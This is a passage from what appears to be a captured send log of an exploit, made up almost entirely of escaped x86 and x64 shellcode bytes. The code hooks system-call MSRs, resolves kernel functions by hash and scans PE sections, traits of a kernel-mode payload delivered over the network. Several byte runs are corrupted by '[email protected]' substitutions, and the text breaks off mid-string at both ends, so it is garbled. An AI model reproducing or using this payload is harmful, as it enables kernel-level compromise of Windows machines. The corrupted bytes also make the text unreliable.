xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 9, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 